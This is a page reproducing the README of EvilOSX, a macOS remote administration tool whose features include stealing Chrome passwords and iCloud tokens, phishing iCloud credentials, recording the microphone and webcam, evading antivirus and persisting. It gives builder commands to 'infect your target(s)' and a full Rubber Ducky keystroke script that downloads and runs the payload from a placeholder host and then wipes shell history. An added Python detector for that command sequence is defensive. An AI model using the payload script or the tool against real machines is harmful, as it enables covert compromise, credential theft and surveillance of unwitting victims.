
EvilOSX: A GUI Remote Administration Tool for Mac OS X


EvilOSX Features:
  • Emulate a terminal instance
  • Simple extendable module system 
  • No bot dependencies (pure python) 
  • Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
  • Persistent 
  • GUI and CLI support
  • Retrieve Chrome passwords 
  • Retrieve iCloud tokens and contacts
  • Retrieve/monitor the clipboard 
  • Retrieve browser history (Chrome and Safari)
  • Phish for iCloud passwords via iTunes 
  • iTunes (iOS) backup enumeration 
  • Record the microphone 
  • Take a desktop screenshot or picture using the webcam
  • Attempt to get root via local privilege escalation
EvilOSX Installation and Running
   Open your Terminal and enter these commands:
   Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.

   For advanced users: There's also a CLI for those who want to use this over SSH:
python start.py --builder # Create a launcher to infect your target(s)
python start.py --cli --port 1337 # Start the CLI

Motivation
   This project was created to be used with the author's Rubber Ducky; here's the simple script:

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

  • It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice.
  • Terminal is spelt that way intentionally; on some systems Spotlight won't find the terminal otherwise.
  • To bypass the keyboard setup assistant, make sure you change the VID&PID, which can be found here. Aluminum Keyboard (ISO) is probably the one you are looking for.
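
Defenders can look for the command sequence this script types. The following is an added example, not part of EvilOSX or the original page: it scores shell command lines from process telemetry for the behaviours visible in the script above (working in /tmp, downloading to a file, running that same file with python, wiping shell history, a delayed killall Terminal). The event format, the indicator names and the assumption that the download uses curl or wget are this example's own.

```python
import re

# Indicators derived from the Rubber Ducky script on this page.
# Indicator names and the event layout are assumptions of this example.
DOWNLOAD = re.compile(r"\b(?:curl\b[^;&|]*?\s-o|wget\b[^;&|]*?\s-O)\s+([^\s;&|]+)")
HISTORY_WIPE = re.compile(r"\bhistory\s+-c\w*")
KILL_TERMINAL = re.compile(r"\bsleep\s+\d+\s*;\s*killall\s+Terminal\b")
WORKDIR = re.compile(r"\bcd\s+(?:/tmp|/private/tmp|/var/tmp)\b")


def indicators(cmdline):
    """Return the set of indicator names found in one shell command line."""
    found = set()
    if WORKDIR.search(cmdline):
        found.add("tmp_workdir")
    m = DOWNLOAD.search(cmdline)
    if m:
        found.add("download_to_file")
        target = re.escape(m.group(1))
        # The downloaded file is handed to a Python interpreter later in the same line.
        if re.search(r"\bpython[\d.]*\s+" + target + r"(?:\s|;|$)", cmdline[m.end():]):
            found.add("download_then_python_exec")
    if HISTORY_WIPE.search(cmdline):
        found.add("history_wipe")
    if KILL_TERMINAL.search(cmdline):
        found.add("delayed_terminal_kill")
    return found


def triage(events, threshold=2):
    """Return (event, sorted indicators) for events with at least `threshold` indicators."""
    scored = ((ev, indicators(ev["cmd"])) for ev in events)
    return [(ev, sorted(f)) for ev, f in scored if len(f) >= threshold]


# Constructed sample telemetry (not real logs); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"pid": 611, "cmd": "screen -dm bash -c 'sleep 6; killall Terminal'"},
    {"pid": 612, "cmd": "cd /tmp; curl -s http://example.invalid/x.py -o 1337.py; python 1337.py; history -cw; clear"},
    {"pid": 700, "cmd": "curl -s https://example.invalid/install.sh -o install.sh"},
    {"pid": 701, "cmd": "cd /tmp; ls -la"},
]

if __name__ == "__main__":
    for ev, found in triage(SAMPLE_EVENTS):
        print(ev["pid"], found)
```

A single indicator such as a download or a cd into /tmp is common in normal use, so only lines that combine several are reported.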
Versioning
   EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible. Server and bot releases will be numbered with the following format:
<major>.<minor>.<patch>

   And constructed with the following guidelines:

  • Breaking backward compatibility (with older bots) bumps the major.
  • New additions without breaking backward compatibility bumps the minor.
  • Bug fixes and misc changes bump the patch.
   For more information on SemVer, please visit Semantic Versioning 2.0.0.

EvilOSX's Issues: Feel free to submit any issues or feature requests here.
 

Contributing: For a simple guide on how to create modules, click here.
 

Thanks for:
  • The awesome Empire project.
  • Shoutout to @patrickwardle for his awesome talks, check out Objective-See.
  • manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted... let me know if you reappear).
  • The slowloris module is pretty much copied from PySlowLoris.
  • urwid and this code which saved me a lot of time with the CLI.
  • Logo created by motusora.
License: GNU General Public License v3.
